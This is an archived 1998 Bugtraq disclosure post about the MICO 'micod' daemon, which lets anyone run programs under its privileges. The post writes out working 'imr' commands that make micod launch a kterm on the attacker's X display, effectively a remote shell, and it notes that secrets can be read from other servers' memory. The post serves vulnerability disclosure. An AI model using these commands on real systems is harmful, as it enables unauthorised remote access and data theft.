Bugtraq mailing list archives
MICO: security problem: Privileges of micod for everybody!
From: dominique () UNRUH DE (Dominique Unruh)
Date: Sun, 10 May 1998 12:30:01 +0200
After having installed MICO (a free CORBA-ORB for C++) I installed the 'micod' (a daemon which is e.g. able to create objects on request). I put it in my boot-up scripts, so it ran as root, but this exploit will work too, if it is started as another user. After thinking for a moment I tried this (as guest, but could be a user on another system too): (micod ist started on inet:winkelklinke.local:8888) (hacking from enfin.local, which has X on display :0) imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared "kterm -display enfin.local:0 & echo" IDL:Anything:1.0 imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play kterm will start as child of micod and connect to enfin.local:0. (any other program should work too, but xterm didn't start correctly, I don't know why) The 'echo' after the '&' is needed to absorb the arguments micod add to the command-line. Now you can do everything. Don't underestimate the problem if micod is not installed root: 1. You can login, it's as good as a pwd-free guest account. 2. You may control other servers started by micod or see their process-memory (e.g. under Linux with /proc, but their may be other ways on other systems), which may contain sensitive data as access password, credit card information or whatever, depending of your application. I think, there should be some kind of access limitation when writing into the Implemetation Repository (the information managed by micod). And there should be a visible warning in the documentation. DniQ. PS: Hallo Nahne!
Current thread:
- Re: 3Com switches - undocumented access level.), (continued)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level.) Joao Carlos Mendes Luis (May 10)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level. der Mouse (May 08)
- Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
- Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
- Re: 3Com switches - undocumented access level. Michael Mittelstadt (May 10)
- Re: 3Com switches - undocumented access level. NetSurfer (May 11)
- Bay Networks Security Hole Marty Rigaletto (May 09)
- coke.c snupe (May 09)
- MICO: security problem: Privileges of micod for everybody! Dominique Unruh (May 10)
- Re: MICO: security problem: Privileges of micod for everybody! Miguel de Icaza (May 10)
- Re: Bay Networks Security Hole Jason Ackley (May 10)